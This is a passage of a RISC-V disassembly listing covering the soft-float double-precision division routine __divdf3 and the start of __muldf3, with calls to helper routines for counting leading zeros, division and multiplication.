80000d90: 01fada93 srli s5,s5,0x1f
80000d94: 10050263 beqz a0,80000e98 <__divdf3+0x1a8>
80000d98: 7ff00793 li a5,2047
80000d9c: 16f50263 beq a0,a5,80000f00 <__divdf3+0x210>
80000da0: 00800437 lui s0,0x800
80000da4: 00391913 slli s2,s2,0x3
80000da8: 00896933 or s2,s2,s0
80000dac: 01dc5413 srli s0,s8,0x1d
80000db0: 01246433 or s0,s0,s2
80000db4: 003c1593 slli a1,s8,0x3
80000db8: c0150513 addi a0,a0,-1023
80000dbc: 00000793 li a5,0
80000dc0: 002b9713 slli a4,s7,0x2
80000dc4: 00f76733 or a4,a4,a5
80000dc8: fff70713 addi a4,a4,-1
80000dcc: 00e00693 li a3,14
80000dd0: 0159c933 xor s2,s3,s5
80000dd4: 40aa0a33 sub s4,s4,a0
80000dd8: 16e6e063 bltu a3,a4,80000f38 <__divdf3+0x248>
80000ddc: 00002697 auipc a3,0x2
80000de0: 4d068693 addi a3,a3,1232 # 800032ac <end+0x5e0>
80000de4: 00271713 slli a4,a4,0x2
80000de8: 00d70733 add a4,a4,a3
80000dec: 00072703 lw a4,0(a4)
80000df0: 00d70733 add a4,a4,a3
80000df4: 00070067 jr a4
80000df8: 00a46b33 or s6,s0,a0
80000dfc: 060b0e63 beqz s6,80000e78 <__divdf3+0x188>
80000e00: 04040063 beqz s0,80000e40 <__divdf3+0x150>
80000e04: 00040513 mv a0,s0
80000e08: 679010ef jal ra,80002c80 <__clzsi2>
80000e0c: ff550793 addi a5,a0,-11
80000e10: 01c00713 li a4,28
80000e14: 02f74c63 blt a4,a5,80000e4c <__divdf3+0x15c>
80000e18: 01d00b13 li s6,29
80000e1c: ff850493 addi s1,a0,-8
80000e20: 40fb0b33 sub s6,s6,a5
80000e24: 00941433 sll s0,s0,s1
80000e28: 01695b33 srl s6,s2,s6
80000e2c: 008b6b33 or s6,s6,s0
80000e30: 009914b3 sll s1,s2,s1
80000e34: c0d00a13 li s4,-1011
80000e38: 40aa0a33 sub s4,s4,a0
80000e3c: f39ff06f j 80000d74 <__divdf3+0x84>
80000e40: 641010ef jal ra,80002c80 <__clzsi2>
80000e44: 02050513 addi a0,a0,32
80000e48: fc5ff06f j 80000e0c <__divdf3+0x11c>
80000e4c: fd850413 addi s0,a0,-40
80000e50: 00891b33 sll s6,s2,s0
80000e54: 00000493 li s1,0
80000e58: fddff06f j 80000e34 <__divdf3+0x144>
80000e5c: 00a46b33 or s6,s0,a0
80000e60: 020b0463 beqz s6,80000e88 <__divdf3+0x198>
80000e64: 00050493 mv s1,a0
80000e68: 00040b13 mv s6,s0
80000e6c: 7ff00a13 li s4,2047
80000e70: 00300b93 li s7,3
80000e74: f05ff06f j 80000d78 <__divdf3+0x88>
80000e78: 00000493 li s1,0
80000e7c: 00000a13 li s4,0
80000e80: 00100b93 li s7,1
80000e84: ef5ff06f j 80000d78 <__divdf3+0x88>
80000e88: 00000493 li s1,0
80000e8c: 7ff00a13 li s4,2047
80000e90: 00200b93 li s7,2
80000e94: ee5ff06f j 80000d78 <__divdf3+0x88>
80000e98: 01896433 or s0,s2,s8
80000e9c: 06040e63 beqz s0,80000f18 <__divdf3+0x228>
80000ea0: 04090063 beqz s2,80000ee0 <__divdf3+0x1f0>
80000ea4: 00090513 mv a0,s2
80000ea8: 5d9010ef jal ra,80002c80 <__clzsi2>
80000eac: ff550793 addi a5,a0,-11
80000eb0: 01c00713 li a4,28
80000eb4: 02f74e63 blt a4,a5,80000ef0 <__divdf3+0x200>
80000eb8: 01d00413 li s0,29
80000ebc: ff850593 addi a1,a0,-8
80000ec0: 40f40433 sub s0,s0,a5
80000ec4: 00b91933 sll s2,s2,a1
80000ec8: 008c5433 srl s0,s8,s0
80000ecc: 01246433 or s0,s0,s2
80000ed0: 00bc15b3 sll a1,s8,a1
80000ed4: c0d00713 li a4,-1011
80000ed8: 40a70533 sub a0,a4,a0
80000edc: ee1ff06f j 80000dbc <__divdf3+0xcc>
80000ee0: 000c0513 mv a0,s8
80000ee4: 59d010ef jal ra,80002c80 <__clzsi2>
80000ee8: 02050513 addi a0,a0,32
80000eec: fc1ff06f j 80000eac <__divdf3+0x1bc>
80000ef0: fd850413 addi s0,a0,-40
80000ef4: 008c1433 sll s0,s8,s0
80000ef8: 00000593 li a1,0
80000efc: fd9ff06f j 80000ed4 <__divdf3+0x1e4>
80000f00: 01896433 or s0,s2,s8
80000f04: 02040263 beqz s0,80000f28 <__divdf3+0x238>
80000f08: 00090413 mv s0,s2
80000f0c: 7ff00513 li a0,2047
80000f10: 00300793 li a5,3
80000f14: eadff06f j 80000dc0 <__divdf3+0xd0>
80000f18: 00000593 li a1,0
80000f1c: 00000513 li a0,0
80000f20: 00100793 li a5,1
80000f24: e9dff06f j 80000dc0 <__divdf3+0xd0>
80000f28: 00000593 li a1,0
80000f2c: 7ff00513 li a0,2047
80000f30: 00200793 li a5,2
80000f34: e8dff06f j 80000dc0 <__divdf3+0xd0>
80000f38: 01646663 bltu s0,s6,80000f44 <__divdf3+0x254>
80000f3c: 488b1263 bne s6,s0,800013c0 <__divdf3+0x6d0>
80000f40: 48b4e063 bltu s1,a1,800013c0 <__divdf3+0x6d0>
80000f44: 01fb1693 slli a3,s6,0x1f
80000f48: 0014d713 srli a4,s1,0x1
80000f4c: 01f49c13 slli s8,s1,0x1f
80000f50: 001b5b13 srli s6,s6,0x1
80000f54: 00e6e4b3 or s1,a3,a4
80000f58: 00841413 slli s0,s0,0x8
80000f5c: 0185dc93 srli s9,a1,0x18
80000f60: 008cecb3 or s9,s9,s0
80000f64: 010cda93 srli s5,s9,0x10
80000f68: 010c9793 slli a5,s9,0x10
80000f6c: 0107d793 srli a5,a5,0x10
80000f70: 00859d13 slli s10,a1,0x8
80000f74: 000b0513 mv a0,s6
80000f78: 000a8593 mv a1,s5
80000f7c: 00f12223 sw a5,4(sp)
80000f80: 455010ef jal ra,80002bd4 <__udivsi3>
80000f84: 00050593 mv a1,a0
80000f88: 00050b93 mv s7,a0
80000f8c: 010c9513 slli a0,s9,0x10
80000f90: 01055513 srli a0,a0,0x10
80000f94: 415010ef jal ra,80002ba8 <__mulsi3>
80000f98: 00050413 mv s0,a0
80000f9c: 000a8593 mv a1,s5
80000fa0: 000b0513 mv a0,s6
80000fa4: 479010ef jal ra,80002c1c <__umodsi3>
80000fa8: 01051513 slli a0,a0,0x10
80000fac: 0104d713 srli a4,s1,0x10
80000fb0: 00a76533 or a0,a4,a0
80000fb4: 000b8993 mv s3,s7
80000fb8: 00857e63 bleu s0,a0,80000fd4 <__divdf3+0x2e4>
80000fbc: 01950533 add a0,a0,s9
80000fc0: fffb8993 addi s3,s7,-1
80000fc4: 01956863 bltu a0,s9,80000fd4 <__divdf3+0x2e4>
80000fc8: 00857663 bleu s0,a0,80000fd4 <__divdf3+0x2e4>
80000fcc: ffeb8993 addi s3,s7,-2
80000fd0: 01950533 add a0,a0,s9
80000fd4: 40850433 sub s0,a0,s0
80000fd8: 000a8593 mv a1,s5
80000fdc: 00040513 mv a0,s0
80000fe0: 3f5010ef jal ra,80002bd4 <__udivsi3>
80000fe4: 00050593 mv a1,a0
80000fe8: 00050b93 mv s7,a0
80000fec: 010c9513 slli a0,s9,0x10
80000ff0: 01055513 srli a0,a0,0x10
80000ff4: 3b5010ef jal ra,80002ba8 <__mulsi3>
80000ff8: 00050b13 mv s6,a0
80000ffc: 000a8593 mv a1,s5
80001000: 00040513 mv a0,s0
80001004: 419010ef jal ra,80002c1c <__umodsi3>
80001008: 01049d93 slli s11,s1,0x10
8000100c: 01051513 slli a0,a0,0x10
80001010: 010ddd93 srli s11,s11,0x10
80001014: 00adedb3 or s11,s11,a0
80001018: 000b8713 mv a4,s7
8000101c: 016dfe63 bleu s6,s11,80001038 <__divdf3+0x348>
80001020: 019d8db3 add s11,s11,s9
80001024: fffb8713 addi a4,s7,-1
80001028: 019de863 bltu s11,s9,80001038 <__divdf3+0x348>
8000102c: 016df663 bleu s6,s11,80001038 <__divdf3+0x348>
80001030: ffeb8713 addi a4,s7,-2
80001034: 019d8db3 add s11,s11,s9
80001038: 01099693 slli a3,s3,0x10
8000103c: 000104b7 lui s1,0x10
80001040: 00e6e6b3 or a3,a3,a4
80001044: 416d8db3 sub s11,s11,s6
80001048: fff48b13 addi s6,s1,-1 # ffff <_stack_size+0xfbff>
8000104c: 0166f733 and a4,a3,s6
80001050: 016d7b33 and s6,s10,s6
80001054: 00070513 mv a0,a4
80001058: 000b0593 mv a1,s6
8000105c: 0106d413 srli s0,a3,0x10
80001060: 00d12623 sw a3,12(sp)
80001064: 00e12423 sw a4,8(sp)
80001068: 341010ef jal ra,80002ba8 <__mulsi3>
8000106c: 00a12223 sw a0,4(sp)
80001070: 000b0593 mv a1,s6
80001074: 00040513 mv a0,s0
80001078: 331010ef jal ra,80002ba8 <__mulsi3>
8000107c: 010d5b93 srli s7,s10,0x10
80001080: 00050993 mv s3,a0
80001084: 000b8593 mv a1,s7
80001088: 00040513 mv a0,s0
8000108c: 31d010ef jal ra,80002ba8 <__mulsi3>
80001090: 00812703 lw a4,8(sp)
80001094: 00050413 mv s0,a0
80001098: 000b8513 mv a0,s7
8000109c: 00070593 mv a1,a4
800010a0: 309010ef jal ra,80002ba8 <__mulsi3>
800010a4: 00412603 lw a2,4(sp)
800010a8: 01350533 add a0,a0,s3
800010ac: 00c12683 lw a3,12(sp)
800010b0: 01065713 srli a4,a2,0x10
800010b4: 00a70733 add a4,a4,a0
800010b8: 01377463 bleu s3,a4,800010c0 <__divdf3+0x3d0>
800010bc: 00940433 add s0,s0,s1
800010c0: 00010537 lui a0,0x10
800010c4: fff50513 addi a0,a0,-1 # ffff <_stack_size+0xfbff>
800010c8: 01075493 srli s1,a4,0x10
800010cc: 00a779b3 and s3,a4,a0
800010d0: 01099993 slli s3,s3,0x10
800010d4: 00a67633 and a2,a2,a0
800010d8: 008484b3 add s1,s1,s0
800010dc: 00c989b3 add s3,s3,a2
800010e0: 009de863 bltu s11,s1,800010f0 <__divdf3+0x400>
800010e4: 00068413 mv s0,a3
800010e8: 049d9463 bne s11,s1,80001130 <__divdf3+0x440>
800010ec: 053c7263 bleu s3,s8,80001130 <__divdf3+0x440>
800010f0: 01ac0c33 add s8,s8,s10
800010f4: 01ac3733 sltu a4,s8,s10
800010f8: 01970733 add a4,a4,s9
800010fc: 00ed8db3 add s11,s11,a4
80001100: fff68413 addi s0,a3,-1
80001104: 01bce663 bltu s9,s11,80001110 <__divdf3+0x420>
80001108: 03bc9463 bne s9,s11,80001130 <__divdf3+0x440>
8000110c: 03ac6263 bltu s8,s10,80001130 <__divdf3+0x440>
80001110: 009de663 bltu s11,s1,8000111c <__divdf3+0x42c>
80001114: 01b49e63 bne s1,s11,80001130 <__divdf3+0x440>
80001118: 013c7c63 bleu s3,s8,80001130 <__divdf3+0x440>
8000111c: 01ac0c33 add s8,s8,s10
80001120: 01ac3733 sltu a4,s8,s10
80001124: 01970733 add a4,a4,s9
80001128: ffe68413 addi s0,a3,-2
8000112c: 00ed8db3 add s11,s11,a4
80001130: 413c09b3 sub s3,s8,s3
80001134: 409d84b3 sub s1,s11,s1
80001138: 013c37b3 sltu a5,s8,s3
8000113c: 40f484b3 sub s1,s1,a5
80001140: fff00593 li a1,-1
80001144: 1a9c8863 beq s9,s1,800012f4 <__divdf3+0x604>
80001148: 000a8593 mv a1,s5
8000114c: 00048513 mv a0,s1
80001150: 285010ef jal ra,80002bd4 <__udivsi3>
80001154: 00050593 mv a1,a0
80001158: 00a12423 sw a0,8(sp)
8000115c: 010c9513 slli a0,s9,0x10
80001160: 01055513 srli a0,a0,0x10
80001164: 245010ef jal ra,80002ba8 <__mulsi3>
80001168: 00a12223 sw a0,4(sp)
8000116c: 000a8593 mv a1,s5
80001170: 00048513 mv a0,s1
80001174: 2a9010ef jal ra,80002c1c <__umodsi3>
80001178: 00812683 lw a3,8(sp)
8000117c: 00412703 lw a4,4(sp)
80001180: 01051513 slli a0,a0,0x10
80001184: 0109d793 srli a5,s3,0x10
80001188: 00a7e533 or a0,a5,a0
8000118c: 00068d93 mv s11,a3
80001190: 00e57e63 bleu a4,a0,800011ac <__divdf3+0x4bc>
80001194: 01950533 add a0,a0,s9
80001198: fff68d93 addi s11,a3,-1
8000119c: 01956863 bltu a0,s9,800011ac <__divdf3+0x4bc>
800011a0: 00e57663 bleu a4,a0,800011ac <__divdf3+0x4bc>
800011a4: ffe68d93 addi s11,a3,-2
800011a8: 01950533 add a0,a0,s9
800011ac: 40e504b3 sub s1,a0,a4
800011b0: 000a8593 mv a1,s5
800011b4: 00048513 mv a0,s1
800011b8: 21d010ef jal ra,80002bd4 <__udivsi3>
800011bc: 00050593 mv a1,a0
800011c0: 00a12223 sw a0,4(sp)
800011c4: 010c9513 slli a0,s9,0x10
800011c8: 01055513 srli a0,a0,0x10
800011cc: 1dd010ef jal ra,80002ba8 <__mulsi3>
800011d0: 00050c13 mv s8,a0
800011d4: 000a8593 mv a1,s5
800011d8: 00048513 mv a0,s1
800011dc: 241010ef jal ra,80002c1c <__umodsi3>
800011e0: 01099993 slli s3,s3,0x10
800011e4: 00412703 lw a4,4(sp)
800011e8: 01051513 slli a0,a0,0x10
800011ec: 0109d993 srli s3,s3,0x10
800011f0: 00a9e533 or a0,s3,a0
800011f4: 00070793 mv a5,a4
800011f8: 01857e63 bleu s8,a0,80001214 <__divdf3+0x524>
800011fc: 01950533 add a0,a0,s9
80001200: fff70793 addi a5,a4,-1
80001204: 01956863 bltu a0,s9,80001214 <__divdf3+0x524>
80001208: 01857663 bleu s8,a0,80001214 <__divdf3+0x524>
8000120c: ffe70793 addi a5,a4,-2
80001210: 01950533 add a0,a0,s9
80001214: 010d9493 slli s1,s11,0x10
80001218: 00f4e4b3 or s1,s1,a5
8000121c: 01049793 slli a5,s1,0x10
80001220: 0107d793 srli a5,a5,0x10
80001224: 000b0593 mv a1,s6
80001228: 418509b3 sub s3,a0,s8
8000122c: 00078513 mv a0,a5
80001230: 00f12223 sw a5,4(sp)
80001234: 0104dd93 srli s11,s1,0x10
80001238: 171010ef jal ra,80002ba8 <__mulsi3>
8000123c: 000b0593 mv a1,s6
80001240: 00050a93 mv s5,a0
80001244: 000d8513 mv a0,s11
80001248: 161010ef jal ra,80002ba8 <__mulsi3>
8000124c: 00050c13 mv s8,a0
80001250: 000d8593 mv a1,s11
80001254: 000b8513 mv a0,s7
80001258: 151010ef jal ra,80002ba8 <__mulsi3>
8000125c: 00412783 lw a5,4(sp)
80001260: 00050b13 mv s6,a0
80001264: 000b8513 mv a0,s7
80001268: 00078593 mv a1,a5
8000126c: 13d010ef jal ra,80002ba8 <__mulsi3>
80001270: 01850533 add a0,a0,s8
80001274: 010ad793 srli a5,s5,0x10
80001278: 00a78533 add a0,a5,a0
8000127c: 01857663 bleu s8,a0,80001288 <__divdf3+0x598>
80001280: 000107b7 lui a5,0x10
80001284: 00fb0b33 add s6,s6,a5
80001288: 000106b7 lui a3,0x10
8000128c: fff68693 addi a3,a3,-1 # ffff <_stack_size+0xfbff>
80001290: 01055793 srli a5,a0,0x10
80001294: 00d57733 and a4,a0,a3
80001298: 01071713 slli a4,a4,0x10
8000129c: 00dafab3 and s5,s5,a3
800012a0: 016787b3 add a5,a5,s6
800012a4: 01570733 add a4,a4,s5
800012a8: 00f9e863 bltu s3,a5,800012b8 <__divdf3+0x5c8>
800012ac: 00048593 mv a1,s1
800012b0: 04f99063 bne s3,a5,800012f0 <__divdf3+0x600>
800012b4: 04070063 beqz a4,800012f4 <__divdf3+0x604>
800012b8: 013c8533 add a0,s9,s3
800012bc: fff48593 addi a1,s1,-1
800012c0: 03956463 bltu a0,s9,800012e8 <__divdf3+0x5f8>
800012c4: 00f56663 bltu a0,a5,800012d0 <__divdf3+0x5e0>
800012c8: 02f51463 bne a0,a5,800012f0 <__divdf3+0x600>
800012cc: 02ed7063 bleu a4,s10,800012ec <__divdf3+0x5fc>
800012d0: 001d1693 slli a3,s10,0x1
800012d4: 01a6bd33 sltu s10,a3,s10
800012d8: 019d0cb3 add s9,s10,s9
800012dc: ffe48593 addi a1,s1,-2
800012e0: 01950533 add a0,a0,s9
800012e4: 00068d13 mv s10,a3
800012e8: 00f51463 bne a0,a5,800012f0 <__divdf3+0x600>
800012ec: 01a70463 beq a4,s10,800012f4 <__divdf3+0x604>
800012f0: 0015e593 ori a1,a1,1
800012f4: 3ffa0713 addi a4,s4,1023
800012f8: 12e05263 blez a4,8000141c <__divdf3+0x72c>
800012fc: 0075f793 andi a5,a1,7
80001300: 02078063 beqz a5,80001320 <__divdf3+0x630>
80001304: 00f5f793 andi a5,a1,15
80001308: 00400693 li a3,4
8000130c: 00d78a63 beq a5,a3,80001320 <__divdf3+0x630>
80001310: 00458693 addi a3,a1,4
80001314: 00b6b5b3 sltu a1,a3,a1
80001318: 00b40433 add s0,s0,a1
8000131c: 00068593 mv a1,a3
80001320: 00741793 slli a5,s0,0x7
80001324: 0007da63 bgez a5,80001338 <__divdf3+0x648>
80001328: ff0007b7 lui a5,0xff000
8000132c: fff78793 addi a5,a5,-1 # feffffff <_stack_start+0x7eff9b2f>
80001330: 00f47433 and s0,s0,a5
80001334: 400a0713 addi a4,s4,1024
80001338: 7fe00793 li a5,2046
8000133c: 1ae7c263 blt a5,a4,800014e0 <__divdf3+0x7f0>
80001340: 01d41793 slli a5,s0,0x1d
80001344: 0035d593 srli a1,a1,0x3
80001348: 00b7e7b3 or a5,a5,a1
8000134c: 00345413 srli s0,s0,0x3
80001350: 001006b7 lui a3,0x100
80001354: fff68693 addi a3,a3,-1 # fffff <_stack_size+0xffbff>
80001358: 00d47433 and s0,s0,a3
8000135c: 801006b7 lui a3,0x80100
80001360: 7ff77713 andi a4,a4,2047
80001364: fff68693 addi a3,a3,-1 # 800fffff <_stack_start+0xf9b2f>
80001368: 01471713 slli a4,a4,0x14
8000136c: 00d47433 and s0,s0,a3
80001370: 01f91913 slli s2,s2,0x1f
80001374: 00e46433 or s0,s0,a4
80001378: 01246733 or a4,s0,s2
8000137c: 04c12083 lw ra,76(sp)
80001380: 04812403 lw s0,72(sp)
80001384: 04412483 lw s1,68(sp)
80001388: 04012903 lw s2,64(sp)
8000138c: 03c12983 lw s3,60(sp)
80001390: 03812a03 lw s4,56(sp)
80001394: 03412a83 lw s5,52(sp)
80001398: 03012b03 lw s6,48(sp)
8000139c: 02c12b83 lw s7,44(sp)
800013a0: 02812c03 lw s8,40(sp)
800013a4: 02412c83 lw s9,36(sp)
800013a8: 02012d03 lw s10,32(sp)
800013ac: 01c12d83 lw s11,28(sp)
800013b0: 00078513 mv a0,a5
800013b4: 00070593 mv a1,a4
800013b8: 05010113 addi sp,sp,80
800013bc: 00008067 ret
800013c0: fffa0a13 addi s4,s4,-1
800013c4: 00000c13 li s8,0
800013c8: b91ff06f j 80000f58 <__divdf3+0x268>
800013cc: 00098913 mv s2,s3
800013d0: 000b0413 mv s0,s6
800013d4: 00048593 mv a1,s1
800013d8: 000b8793 mv a5,s7
800013dc: 00200713 li a4,2
800013e0: 10e78063 beq a5,a4,800014e0 <__divdf3+0x7f0>
800013e4: 00300713 li a4,3
800013e8: 0ee78263 beq a5,a4,800014cc <__divdf3+0x7dc>
800013ec: 00100713 li a4,1
800013f0: f0e792e3 bne a5,a4,800012f4 <__divdf3+0x604>
800013f4: 00000413 li s0,0
800013f8: 00000793 li a5,0
800013fc: 0940006f j 80001490 <__divdf3+0x7a0>
80001400: 000a8913 mv s2,s5
80001404: fd9ff06f j 800013dc <__divdf3+0x6ec>
80001408: 00080437 lui s0,0x80
8000140c: 00000593 li a1,0
80001410: 00000913 li s2,0
80001414: 00300793 li a5,3
80001418: fc5ff06f j 800013dc <__divdf3+0x6ec>
8000141c: 00100693 li a3,1
80001420: 40e686b3 sub a3,a3,a4
80001424: 03800793 li a5,56
80001428: fcd7c6e3 blt a5,a3,800013f4 <__divdf3+0x704>
8000142c: 01f00793 li a5,31
80001430: 06d7c463 blt a5,a3,80001498 <__divdf3+0x7a8>
80001434: 41ea0a13 addi s4,s4,1054
80001438: 014417b3 sll a5,s0,s4
8000143c: 00d5d733 srl a4,a1,a3
80001440: 01459a33 sll s4,a1,s4
80001444: 00e7e7b3 or a5,a5,a4
80001448: 01403a33 snez s4,s4
8000144c: 0147e7b3 or a5,a5,s4
80001450: 00d45433 srl s0,s0,a3
80001454: 0077f713 andi a4,a5,7
80001458: 02070063 beqz a4,80001478 <__divdf3+0x788>
8000145c: 00f7f713 andi a4,a5,15
80001460: 00400693 li a3,4
80001464: 00d70a63 beq a4,a3,80001478 <__divdf3+0x788>
80001468: 00478713 addi a4,a5,4
8000146c: 00f737b3 sltu a5,a4,a5
80001470: 00f40433 add s0,s0,a5
80001474: 00070793 mv a5,a4
80001478: 00841713 slli a4,s0,0x8
8000147c: 06074a63 bltz a4,800014f0 <__divdf3+0x800>
80001480: 01d41713 slli a4,s0,0x1d
80001484: 0037d793 srli a5,a5,0x3
80001488: 00f767b3 or a5,a4,a5
8000148c: 00345413 srli s0,s0,0x3
80001490: 00000713 li a4,0
80001494: ebdff06f j 80001350 <__divdf3+0x660>
80001498: fe100793 li a5,-31
8000149c: 40e787b3 sub a5,a5,a4
800014a0: 02000713 li a4,32
800014a4: 00f457b3 srl a5,s0,a5
800014a8: 00000513 li a0,0
800014ac: 00e68663 beq a3,a4,800014b8 <__divdf3+0x7c8>
800014b0: 43ea0a13 addi s4,s4,1086
800014b4: 01441533 sll a0,s0,s4
800014b8: 00b56a33 or s4,a0,a1
800014bc: 01403a33 snez s4,s4
800014c0: 0147e7b3 or a5,a5,s4
800014c4: 00000413 li s0,0
800014c8: f8dff06f j 80001454 <__divdf3+0x764>
800014cc: 00080437 lui s0,0x80
800014d0: 00000793 li a5,0
800014d4: 7ff00713 li a4,2047
800014d8: 00000913 li s2,0
800014dc: e75ff06f j 80001350 <__divdf3+0x660>
800014e0: 00000413 li s0,0
800014e4: 00000793 li a5,0
800014e8: 7ff00713 li a4,2047
800014ec: e65ff06f j 80001350 <__divdf3+0x660>
800014f0: 00000413 li s0,0
800014f4: 00000793 li a5,0
800014f8: 00100713 li a4,1
800014fc: e55ff06f j 80001350 <__divdf3+0x660>
80001500 <__muldf3>:
80001500: fa010113 addi sp,sp,-96
80001504: 04812c23 sw s0,88(sp)
80001508: 05312623 sw s3,76(sp)
8000150c: 00100437 lui s0,0x100
80001510: 0145d993 srli s3,a1,0x14
80001514: 04912a23 sw s1,84(sp)
80001518: 05612023 sw s6,64(sp)
8000151c: 03712e23 sw s7,60(sp)
80001520: 03812c23 sw s8,56(sp)
80001524: fff40413 addi s0,s0,-1 # fffff <_stack_size+0xffbff>
80001528: 04112e23 sw ra,92(sp)
8000152c: 05212823 sw s2,80(sp)
80001530: 05412423 sw s4,72(sp)
80001534: 05512223 sw s5,68(sp)
80001538: 03912a23 sw s9,52(sp)
8000153c: 03a12823 sw s10,48(sp)
80001540: 03b12623 sw s11,44(sp)
80001544: 7ff9f993 andi s3,s3,2047
80001548: 00050493 mv s1,a0
8000154c: 00060b93 mv s7,a2
80001550: 00068c13 mv s8,a3
80001554: 00b47433 and s0,s0,a1
80001558: 01f5db13 srli s6,a1,0x1f
8000155c: 0a098863 beqz s3,8000160c <__muldf3+0x10c>
80001560: 7ff00793 li a5,2047
80001564: 10f98663 beq s3,a5,80001670 <__muldf3+0x170>
80001568: 00800937 lui s2,0x800
8000156c: 00341413 slli s0,s0,0x3
80001570: 01246433 or s0,s0,s2
80001574: 01d55913 srli s2,a0,0x1d
80001578: 00896933 or s2,s2,s0
8000157c: 00351d13 slli s10,a0,0x3
80001580: c0198993 addi s3,s3,-1023
80001584: 00000c93 li s9,0
80001588: 014c5513 srli a0,s8,0x14
8000158c: 00100a37 lui s4,0x100
80001590: fffa0a13 addi s4,s4,-1 # fffff <_stack_size+0xffbff>
80001594: 7ff57513 andi a0,a0,2047
80001598: 018a7a33 and s4,s4,s8
8000159c: 000b8493 mv s1,s7
800015a0: 01fc5c13 srli s8,s8,0x1f
800015a4: 10050463 beqz a0,800016ac <__muldf3+0x1ac>
800015a8: 7ff00793 li a5,2047
800015ac: 16f50463 beq a0,a5,80001714 <__muldf3+0x214>
800015b0: 00800437 lui s0,0x800
800015b4: 003a1a13 slli s4,s4,0x3
800015b8: 008a6a33 or s4,s4,s0
800015bc: 01dbd413 srli s0,s7,0x1d
800015c0: 01446433 or s0,s0,s4
800015c4: 003b9493 slli s1,s7,0x3
800015c8: c0150513 addi a0,a0,-1023
800015cc: 00000793 li a5,0
800015d0: 002c9713 slli a4,s9,0x2
800015d4: 00f76733 or a4,a4,a5
800015d8: 00a989b3 add s3,s3,a0
800015dc: fff70713 addi a4,a4,-1
800015e0: 00e00693 li a3,14
800015e4: 018b4bb3 xor s7,s6,s8
800015e8: 00198a93 addi s5,s3,1
800015ec: 16e6e063 bltu a3,a4,8000174c <__muldf3+0x24c>
800015f0: 00002697 auipc a3,0x2
800015f4: cf868693 addi a3,a3,-776 # 800032e8 <end+0x61c>
800015f8: 00271713 slli a4,a4,0x2
800015fc: 00d70733 add a4,a4,a3
80001600: 00072703 lw a4,0(a4)
80001604: 00d70733 add a4,a4,a3
80001608: 00070067 jr a4
8000160c: 00a46933 or s2,s0,a0
80001610: 06090e63 beqz s2,8000168c <__muldf3+0x18c>
80001614: 04040063 beqz s0,80001654 <__muldf3+0x154>
80001618: 00040513 mv a0,s0
8000161c: 664010ef jal ra,80002c80 <__clzsi2>
80001620: ff550793 addi a5,a0,-11
80001624: 01c00713 li a4,28
80001628: 02f74c63 blt a4,a5,80001660 <__muldf3+0x160>
8000162c: 01d00913 li s2,29
80001630: ff850d13 addi s10,a0,-8
80001634: 40f90933 sub s2,s2,a5
80001638: 01a41433 sll s0,s0,s10
8000163c: 0124d933 srl s2,s1,s2
80001640: 00896933 or s2,s2,s0
80001644: 01a49d33 sll s10,s1,s10
80001648: c0d00993 li s3,-1011
8000164c: 40a989b3 sub s3,s3,a0
80001650: f35ff06f j 80001584 <__muldf3+0x84>
80001654: 62c010ef jal ra,80002c80 <__clzsi2>
80001658: 02050513 addi a0,a0,32
8000165c: fc5ff06f j 80001620 <__muldf3+0x120>
80001660: fd850913 addi s2,a0,-40
80001664: 01249933 sll s2,s1,s2
80001668: 00000d13 li s10,0
8000166c: fddff06f j 80001648 <__muldf3+0x148>
80001670: 00a46933 or s2,s0,a0
80001674: 02090463 beqz s2,8000169c <__muldf3+0x19c>
80001678: 00050d13 mv s10,a0
8000167c: 00040913 mv s2,s0
80001680: 7ff00993 li s3,2047
80001684: 00300c93 li s9,3
80001688: f01ff06f j 80001588 <__muldf3+0x88>
8000168c: 00000d13 li s10,0
80001690: 00000993 li s3,0
80001694: 00100c93 li s9,1
80001698: ef1ff06f j 80001588 <__muldf3+0x88>
8000169c: 00000d13 li s10,0
800016a0: 7ff00993 li s3,2047
800016a4: 00200c93 li s9,2
800016a8: ee1ff06f j 80001588 <__muldf3+0x88>
800016ac: 017a6433 or s0,s4,s7
800016b0: 06040e63 beqz s0,8000172c <__muldf3+0x22c>
800016b4: 040a0063 beqz s4,800016f4 <__muldf3+0x1f4>
800016b8: 000a0513 mv a0,s4
800016bc: 5c4010ef jal ra,80002c80 <__clzsi2>
800016c0: ff550793 addi a5,a0,-11
800016c4: 01c00713 li a4,28
800016c8: 02f74e63 blt a4,a5,80001704 <__muldf3+0x204>
800016cc: 01d00413 li s0,29
800016d0: ff850493 addi s1,a0,-8
800016d4: 40f40433 sub s0,s0,a5
800016d8: 009a1a33 sll s4,s4,s1
800016dc: 008bd433 srl s0,s7,s0
800016e0: 01446433 or s0,s0,s4
800016e4: 009b94b3 sll s1,s7,s1
800016e8: c0d00793 li a5,-1011
800016ec: 40a78533 sub a0,a5,a0
800016f0: eddff06f j 800015cc <__muldf3+0xcc>
800016f4: 000b8513 mv a0,s7
800016f8: 588010ef jal ra,80002c80 <__clzsi2>
800016fc: 02050513 addi a0,a0,32
80001700: fc1ff06f j 800016c0 <__muldf3+0x1c0>
80001704: fd850413 addi s0,a0,-40
80001708: 008b9433 sll s0,s7,s0
8000170c: 00000493 li s1,0
80001710: fd9ff06f j 800016e8 <__muldf3+0x1e8>
80001714: 017a6433 or s0,s4,s7
80001718: 02040263 beqz s0,8000173c <__muldf3+0x23c>
8000171c: 000a0413 mv s0,s4
80001720: 7ff00513 li a0,2047
80001724: 00300793 li a5,3
80001728: ea9ff06f j 800015d0 <__muldf3+0xd0>
8000172c: 00000493 li s1,0
80001730: 00000513 li a0,0
80001734: 00100793 li a5,1
80001738: e99ff06f j 800015d0 <__muldf3+0xd0>
8000173c: 00000493 li s1,0
80001740: 7ff00513 li a0,2047
80001744: 00200793 li a5,2
80001748: e89ff06f j 800015d0 <__muldf3+0xd0>
8000174c: 00010737 lui a4,0x10
80001750: fff70a13 addi s4,a4,-1 # ffff <_stack_size+0xfbff>
80001754: 010d5c13 srli s8,s10,0x10
80001758: 0104dd93 srli s11,s1,0x10
8000175c: 014d7d33 and s10,s10,s4
80001760: 0144f4b3 and s1,s1,s4
80001764: 000d0593 mv a1,s10
80001768: 00048513 mv a0,s1
8000176c: 00e12823 sw a4,16(sp)
80001770: 438010ef jal ra,80002ba8 <__mulsi3>
80001774: 00050c93 mv s9,a0
80001778: 00048593 mv a1,s1
8000177c: 000c0513 mv a0,s8
80001780: 428010ef jal ra,80002ba8 <__mulsi3>
80001784: 00a12623 sw a0,12(sp)
80001788: 000d8593 mv a1,s11
8000178c: 000c0513 mv a0,s8
80001790: 418010ef jal ra,80002ba8 <__mulsi3>
80001794: 00050b13 mv s6,a0
80001798: 000d0593 mv a1,s10
